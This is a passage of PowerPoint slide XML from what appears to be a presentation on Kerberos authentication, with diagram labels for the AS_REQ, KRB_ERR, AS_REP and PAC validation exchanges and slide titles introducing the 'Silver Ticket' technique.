            <a:chOff x="2550054" y="4215121"/>
            <a:chExt cx="5319830" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498F2C12-70EF-41AB-A3CB-3D3DE828EAE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipH="1">
              <a:off x="2550054" y="4215121"/>
              <a:ext cx="5190242" cy="1599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40E178-A7CA-4DBA-88B6-CFB0378EE955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="435642">
              <a:off x="2691229" y="4648010"/>
              <a:ext cx="5178655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (optional, for mutual authentication)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FFA3C7-C725-4AE1-8A4B-E07B5B8DB2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1665091" y="3677366"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5B7718-EA42-4376-952E-C9964D286EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9229180" y="1602386"/>
            <a:ext cx="0" cy="2384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FDAAE7-0E4C-4F9E-8BB3-78EC73E39D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263141" y="2039896"/>
            <a:ext cx="2332099" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optional PAC validation Request/Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBC2D70-F582-438D-9CD3-0F3DA7309D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3031958" y="1018435"/>
            <a:ext cx="5221705" cy="1616481"/>
            <a:chOff x="3031958" y="1018435"/>
            <a:chExt cx="5221705" cy="1616481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="Straight Arrow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC4EA1-6F7F-416E-93DC-65774BB1599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3031958" y="1018435"/>
              <a:ext cx="5221705" cy="1616481"/>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8FF6679-51CA-4346-BC51-434245CCB870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4202687" y="1360887"/>
              <a:ext cx="3224108" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>KRB_ERR (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Preauth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> required)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59191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F963-772A-4442-9545-791356821FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 8: Silver Ticket </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E26A211-DDD0-4139-AE63-70FCFD6456D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3328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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Silver Ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2776792" y="2963107"/>
            <a:ext cx="229827" cy="264728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E23493B-BEBF-4A24-BEF5-F87E5587F20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2398696" y="3758258"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="2398696" y="3758258"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F51800C-3F11-4E7A-AB9E-D1BE443E8827}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipV="1">
              <a:off x="2398696" y="3758258"/>
              <a:ext cx="5271247" cy="1682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FF7D9EA-F682-48C4-8EC6-D6C91D2C0991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="381265">
              <a:off x="3721427" y="4188518"/>
              <a:ext cx="2663618" cy="373170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (present TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F535996-1243-41AF-B40A-D53B0C1375C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2550054" y="4215121"/>
            <a:ext cx="5319830" cy="1599172"/>
            <a:chOff x="2550054" y="4215121"/>
            <a:chExt cx="5319830" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498F2C12-70EF-41AB-A3CB-3D3DE828EAE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipH="1">
              <a:off x="2550054" y="4215121"/>
              <a:ext cx="5190242" cy="1599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40E178-A7CA-4DBA-88B6-CFB0378EE955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="435642">
              <a:off x="2691229" y="4648010"/>
              <a:ext cx="5178655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (optional, for mutual authentication)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FFA3C7-C725-4AE1-8A4B-E07B5B8DB2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1665091" y="3677366"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5B7718-EA42-4376-952E-C9964D286EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9229180" y="1602386"/>
            <a:ext cx="0" cy="2384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FDAAE7-0E4C-4F9E-8BB3-78EC73E39D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263141" y="2039896"/>
            <a:ext cx="2332099" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optional PAC validation Request/Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
